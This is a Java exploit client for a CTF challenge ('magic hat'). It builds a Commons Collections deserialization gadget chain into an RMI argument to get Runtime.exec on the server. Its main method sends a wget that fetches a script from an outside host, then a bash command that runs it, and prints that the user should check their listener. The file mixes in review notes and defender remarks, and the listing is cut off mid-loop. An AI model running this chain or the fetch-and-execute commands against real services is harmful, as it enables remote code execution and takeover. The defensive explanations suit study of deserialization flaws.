/*
 * CTF client (Insomni'hack teaser, "magic hat" challenge). Build and run with
 * the challenge's client jar on the classpath:
 *   javac -cp '.:magic_hat_client.jar' Magic.java
 *   java  -cp '.:magic_hat_client.jar' Magic
 */

/* for rmi */
import java.net.InetAddress;
import java.rmi.RemoteException;
import java.rmi.NotBoundException;
import java.rmi.registry.Registry;
import java.rmi.registry.LocateRegistry;
import java.net.UnknownHostException;
import java.util.Properties;
import javax.rmi.ssl.SslRMIClientSocketFactory;
import ch.scrt.model.Hat;
import ch.scrt.model.Wand;
import ch.scrt.WizardAPI;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

/* for gadgets */
import org.apache.commons.collections.bag.AbstractMapBag;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

/**
 * Java-deserialization write-up for the challenge: the RMI argument
 * ({@link Hat}) is rebuilt so that a Commons Collections functor chain sits
 * inside its HashMap and fires while the server deserializes it.
 *
 * Defender's reading of what this file depends on:
 *  - the server deserializes attacker-controlled RMI arguments without a
 *    serialization filter (JEP 290 {@code ObjectInputFilter} /
 *    {@code jdk.serialFilter} would reject the functor classes), and
 *  - a Commons Collections version that (de)serializes
 *    {@code InvokerTransformer}: 3.2.2+ only does so when the
 *    {@code org.apache.commons.collections.enableUnsafeSerialization}
 *    property is set, which is exactly why this client sets it below.
 */
public class Magic {

    /**
     * Entry point. Configures the TLS trust store used by the SSL RMI socket
     * factory (path and password are the challenge's, not secrets), flips
     * the Commons Collections unsafe-serialization flag so the client-side
     * JVM will serialize the functors at all, and then sends two commands
     * through {@link #exec_cmd}: one to fetch a script, one to run it.
     *
     * NOTE(review): the fixed {@code Thread.sleep} is the only sequencing;
     * exec_cmd swallows every exception and returns nothing, so the client
     * has no signal that the first command actually completed.
     *
     * @param args unused
     * @throws Exception propagated from exec_cmd / Thread.sleep
     */
    public static void main(final String[] args) throws Exception {
        Properties props = System.getProperties();
        props.setProperty("javax.net.ssl.trustStore", "/tmp/magic_hat_truststore");
        props.setProperty("javax.net.ssl.trustStorePassword", "magic_hat");
        // Without this, Commons Collections 3.2.2+ refuses to serialize the
        // InvokerTransformer built in get_object. Leaving it unset on the
        // deserializing side is the library's intended mitigation.
        props.setProperty("org.apache.commons.collections.enableUnsafeSerialization", "true");

        /* step 1: fetch the script to a fixed temp path */
        System.out.println("[*] download payload...");
        exec_cmd("/usr/bin/wget -r -O /tmp/asdf99.xx https://lokalhost.pl/fasfafafa");
        Thread.sleep(1000 * 2);

        /*
         * step 2: run it. Two separate calls are used because each command
         * ends up in a single Runtime.exec(String), which does not go through
         * a shell, so chaining shell syntax in one string is awkward.
         */
        System.out.println("[*] execute the payload...");
        exec_cmd("/usr/bin/bash /tmp/asdf99.xx");
        System.out.println("[*] check your listner...");
    }

    /**
     * Looks up the remote {@code Wizard} stub via the SSL RMI registry on
     * port 51966 and invokes {@code castASpell} with a {@link Hat} built by
     * {@link #get_object}; the server's deserialization of that argument is
     * where the functor chain is meant to execute {@code cmd}.
     *
     * NOTE(review): the catch block drops every exception, so a registry
     * lookup failure, a TLS/trust-store problem, or the RemoteException the
     * server presumably returns once the tampered object fails to
     * deserialize cleanly are all indistinguishable from success — at
     * minimum the exception should be logged. {@code RemoteException} is
     * also listed twice in the throws clause.
     *
     * @param cmd command line handed to {@code Runtime.exec} on the remote side
     * @throws IllegalAccessException from the reflection in get_object
     * @throws NoSuchFieldException   from the reflection in get_object
     * @throws RemoteException        from the registry call
     * @throws UnknownHostException   if the challenge host does not resolve
     * @throws NotBoundException      if no {@code "Wizard"} binding exists
     */
    private static void exec_cmd(final String cmd) throws IllegalAccessException, NoSuchFieldException, RemoteException, UnknownHostException, NotBoundException, RemoteException {
        Registry registry = LocateRegistry.getRegistry(InetAddress.getByName("magichat.teaser.insomnihack.ch").getHostName(), 51966, new SslRMIClientSocketFactory());
        WizardAPI api = (WizardAPI) registry.lookup("Wizard");
        Hat h1 = get_object(cmd);
        try {
            api.castASpell(h1);
        } catch (Exception e) {
            // intentionally ignored by the author; see NOTE(review) above
        }
    }

    /**
     * Builds the {@link Hat} whose serialized form carries the gadget chain.
     *
     * Chain, as wired here: {@code ConstantTransformer(Runtime.class)} →
     * {@code getMethod("getRuntime")} → {@code invoke(null)} →
     * {@code exec(cmd)} → {@code ConstantTransformer(1)} (the trailing
     * constant just gives the chain a harmless result value). The chain is
     * installed as the factory of a {@link LazyMap}, which invokes it on a
     * lookup for a missing key; the {@link TiedMapEntry} with key
     * {@code "chuj"} reads through to that map from its
     * {@code getValue()}/{@code hashCode()}.
     *
     * The reflection that follows digs from {@code Hat.content} (an
     * {@link AbstractMapBag}, per the cast) into its backing
     * {@link HashMap} and its {@code table} array — presumably to splice the
     * entry into a bucket so that a hash is recomputed, and the LazyMap hit,
     * during the server's {@code HashMap.readObject}. The loop that does the
     * splice is cut off in this listing, so that part is inferred, not read.
     *
     * NOTE(review): {@code Field f0 = null; f0 = ...} style is redundant;
     * the fields can be declared and assigned in one statement.
     *
     * @param cmd command line embedded in the {@code exec} transformer
     * @return the tampered Hat
     * @throws IllegalAccessException if a reflected field cannot be read
     * @throws NoSuchFieldException   if a field name below does not exist
     *                                in the deployed class versions
     */
    private static Hat get_object(final String cmd) throws IllegalAccessException, NoSuchFieldException {
        final String[] execArgs = new String[] { cmd };
        final Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }),
            new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }),
            new InvokerTransformer("exec", new Class[] { String.class }, execArgs),
            new ConstantTransformer(1)
        };
        Transformer transformerChain = new ChainedTransformer(transformers);

        // LazyMap runs the chain as a value factory on a miss.
        final Map innerMap = new HashMap();
        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
        // Entry whose hashCode()/getValue() read through to lazyMap.
        TiedMapEntry entry = new TiedMapEntry(lazyMap, "chuj");

        // Project types from magic_hat_client.jar; one Wand is added so the
        // bag's HashMap has at least one populated bucket to work with.
        Hat hat = new Hat();
        hat.add(new Wand());

        // Hat.content -> AbstractMapBag.map -> HashMap.table, all via
        // setAccessible(true) since none of these fields are public.
        Field f0 = null;
        f0 = Hat.class.getDeclaredField("content");
        f0.setAccessible(true);
        AbstractMapBag a0 = (AbstractMapBag) f0.get(hat);
        Field f1 = null;
        f1 = AbstractMapBag.class.getDeclaredField("map");
        f1.setAccessible(true);
        Map innimpl = (Map) f1.get(a0);
        Field f2 = null;
        f2 = HashMap.class.getDeclaredField("table");
        f2.setAccessible(true);
        Object[] array = (Object[]) f2.get(innimpl);
        Object node = array[0];
        // Remainder of this method is truncated in this listing.
        for(int i=1; i